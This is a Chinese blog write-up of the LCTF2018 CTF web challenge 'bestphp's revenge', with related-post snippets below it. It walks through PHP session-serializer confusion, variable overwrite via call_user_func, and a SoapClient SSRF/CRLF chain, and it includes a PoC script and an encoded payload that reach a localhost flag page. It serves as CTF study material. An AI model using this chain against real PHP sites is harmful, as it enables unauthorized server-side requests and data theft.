LCTF2018-bestphp‘s revenge

最新推荐文章于 2023-12-13 18:37:38 发布
最新推荐文章于 2023-12-13 18:37:38 发布
阅读量524 收藏
点赞数
文章标签: ctf 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43610673/article/details/118036035
版权 
<?php
highlight_file(__FILE__);
$b = 'implode';
call_user_func($_GET['f'], $_POST);
session_start();
if (isset($_GET['name'])) {
    $_SESSION['name'] = $_GET['name'];
}
var_dump($_SESSION);//打印出seesion的内容
$a = array(reset($_SESSION), 'welcome_to_the_lctf2018');
call_user_func($b, $a);
?>

从代码中不难发现有call_user_func这个代码执行的常见函数,但其第二个参数被传入post数组无法被直接用来执行命令。
当参数为字符串时正常输出phpinfo
在这里插入图片描述

而当传入数组时便不会起效,同时在在php7.1版本之后 assert()默认不再可以执行代码,eval()也是不行的。
在这里插入图片描述

但当call_user_func第一个参数为数组时,会把第一个值当作类名,第二个值当作方法进行回调。那在利用第一个回调函数对$b进行变量覆盖之后,通过两个call_user_func函数的套娃,第二个回调函数处$b=call_user_func$a为一个数组且作为call_user_func函数第一个参数,就可以用来调用php原生类的方法了。
SoapClient类可以用来ssrf:反序列化之PHP原生类的利用
而题目还有个flag.php页面,只能通过本地访问

only localhost can get flag!session_start();
echo 'only localhost can get flag!';
$flag = 'LCTF{*************************}';
if($_SERVER["REMOTE_ADDR"]==="127.0.0.1"){
       $_SESSION['flag'] = $flag;
   }
only localhost can get flag!

那剩下要做的就是ssrf去访问flag.php,然后获取flag。再把SESSION中的flag打印出来。
反序列化的payload传入就需要用到PHP中SESSION的反序列化机制。我们可以利用回调函数来覆盖session默认的序列化引擎。
在这里插入图片描述在这里插入图片描述

构造SSRF的Soap类的序列化字符串POC

<?php
$url = "http://127.0.0.1/flag.php";
$b = new SoapClient(null, array('uri' => $url, 'location' => $url));
$a = serialize($b);
$a = str_replace('^^', "\r\n", $a);
echo "|" . urlencode($a);
?>

在POC中还有个CRLF:SOAP漏洞利用之CRLF与SSRF
Paylaod:|O%3A10%3A%22SoapClient%22%3A3%3A%7Bs%3A3%3A%22uri%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D

利用回调函数覆盖session序列化引擎为php_serilaze,构造SSRF的Soap类的序列化字符串配合序列化注入写入session文件
在这里插入图片描述

然后利用变量覆盖漏洞,覆盖掉变量b为回调函数call_user_func,回调函数调用Soap类的未知方法,触发__call方法进行SSRF访问flag.php,把flag写入session。
在这里插入图片描述

将这个session保存后,访问index.php打印出flag.
在这里插入图片描述

Arnoldqqq
关注
Lctf-2016-pwn100 题解
lifanxin的博客
12-24 842
Write Up知识点和关键字样本运行静态分析程序逻辑求解脚本 知识点和关键字 栈溢出 ROP 无libc泄露函数地址 样本 来自Lctf 2016年的pwn题,样本 pwn100 (这个资源没办法上传,想要样本的可以留言!) 运行 查看文件属性   64位程序,只开了NX保护 运行样本程序 输入超过200个字符串才会回显"bye~",接着报了一个段错误,程序结束 静态分析 把程序拖进到IDA查看,发现main函数比较简单,主要起作用的是sub_40068E()函数,我们直接进入到这个函数。 该函数又
bestphp‘s revenge
m0_63045593的博客
04-22 354
bestphp’s revenge <?php highlight_file(__FILE__); $b = 'implode'; call_user_func($_GET['f'], $_POST); session_start(); if (isset($_GET['name'])) { $_SESSION['name'] = $_GET['name']; } var_dump($_SESSION); $a = array(reset($_SESSION), 'welcome_to_th
bestphp's revenge
沐目的博客
11-08 2074
1.知识点 1.1 SoapClient(待完善) 这是一个php内置的类,当__call方法被触发后,它可以发送HTTP和HTTPS请求。具体的还不太懂,只知道它可以用来造成ssrf漏洞。 <?php $target = "http://127.0.0.1/flag.php"; $attack = new SoapClient(null,array('location' => $ta...
LCTF_2018_Platform:LCTF 2018平台
05-04
LCTF 2018 platform LCTF 2018 比赛平台。 本项目中前端代码为webpack打包后的前端代码,前端源码参见。 部署 项目使用nginx+uwsgi+django部署,示例的和都已上传。 uwsgi配置文件中为控制权限使用nginx:nginx用户启动,请按需修改(大部分系统nginx用户为www-data:www-data)。然后把web目录owner修改为uwsgi的启动用户: chown -R nginx:nginx . 开发版本为python 2.7,未测试过其他版本的兼容性。 食用方法 默认后台路径 api/admin/ 可在app/backend/lctf2018_backend/urls.py中修改。 默认后台管理账号密码 admin admin123456 使用时千万别忘了 cd app/backend python manage.py change
[LCTF 2018]bestphp‘s revenge
最新发布
rev1ve的博客
12-13 1181
即达到session_start(array(‘serialize_handler’ => ‘php_serialize’)) ,将会根据php7特性设置session.serialize_handler=php_serialize。思路就是利用SoapClient 类构造出ssrf的序列化字符串,然后利用call_user_func修改配置,造成序列化与反序列化引擎不同的漏洞,然后调用extract函数去变量覆盖,调用SoapClient类,从而触发__call 方法。
[LCTF]bestphp‘s revenge
qq_45691294的博客
09-25 877
知识点:session反序列化->soap(ssrf+crlf)->call_user_func激活soap类 题目直接提供了index.php和flag.php的源码 //index.php <?php highlight_file(__FILE__); $b = 'implode'; call_user_func($_GET['f'], $_POST); session_start(); if (isset($_GET['name'])) { $_SESSION['name'
bestphp‘s revenge/ 安洵杯Babyphpphpsession题目)
qq_62046696的博客
11-30 1227
改变phpsessionid为我们编写代码的那个值就可以获得flag大概思路是这样,等题目上平台,再复现。
LCTF2017-WEB-LPLAYGROUND:LCTF2017网站题L_PLAYGROUND
03-23
LCTF2017C L_PLAYGROUND 0x00.LCTF2017 0X01。项目介绍 这个项目是LCTF2017的网络题L_PLAYGROUND的开放原始码。 ./doc/build.md指南在./doc/build.md ./doc/writeup.md在./doc/writeup.md 0x02。参考 0x03。后记 这...
LCTF2017-2ez4u writeup 另一种思路
charlie_heng的专栏
08-11 721
之前没怎么用过largebin attack,于是搜了下题来做 审计了下,有个UAF漏洞,PIE开了,能打印,那跟fengshui那题差不多了 于是骚操作了一波,leak出libc基址,unsorted bin attack攻击malloc_hook上的位置,其实这里攻击free_hook上面的也是可以的,然后fastbin attack直接控制_malloc_hook,填one_gadget...
LCTF-学习-MISC100-200
Kn1ght_Gin的博客
10-25 1172
开始一本正经水CTF,先从刷writeup开始。本次学习对象是刚刚结束的LCTF,参考AAA的writeup,自己动手重现破解过程,并记录知识点。 0x0 MISC100: 类型: 读取图片中的内容,获取AES初始秘钥,在函数中经过一定的重新置换,获取最终秘钥。要求输入EditText内容经秘钥加密后,与给定的new byte[] { 21, -93, -68, -94, 86, 1
LCTF 2018 easy_heap
yms0211的博客
09-18 207
LCTF 2018 easy_heap
LCTF2018 ggbank 薅羊毛实战
Fly_鹏程万里
11-21 608
11.18号结束的LCTF2018中有一个很有趣的智能合约题目叫做ggbank,题目的原意是考察弱随机数问题,但在题目的设定上挺有意思的,加入了一个对地址的验证,导致弱随机的难度高了许多,反倒是薅羊毛更快乐了,下面就借这个题聊聊关于薅羊毛的实战操作。 分析 源代码https://ropsten.etherscan.io/address/0x7caa18d765e5b4c3bf083113792...
LCTF2018 PWN easy_heap学习(以及tcache基础认识)
a2590035252的博客
09-24 478
适合于广大像我一样的pwn爱好者
bestphp‘s revenge 1
m0_62129839的博客
02-20 202
因为$b变量已经被我们覆盖成了call_user_func,那么此时的程序,就变成了call_user_func(call_user_func,array($_session,‘welcome_to_the_lctf2018’));9. $_session这个对象,会去调用“welcome_to_the_lctf2018”这个不存在的方法,于是__call方法被。
BUU-bestphp‘revenge
unexpectedthing的博客
02-11 845
文章目录前言WPcall_user_func函数php中session反序列化机制构造SSRF之SoapClient类CRLF Injection漏洞解题步骤总结 前言 这个题主要综合了很多知识点,特别综合 考点: session反序列化 原生类SoapClient的SSRF 变量覆盖 CRLF WP 首页代码 <?php highlight_file(__FILE__); $b = 'implode'; call_user_func($_GET['f'], $_POST); session_st
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值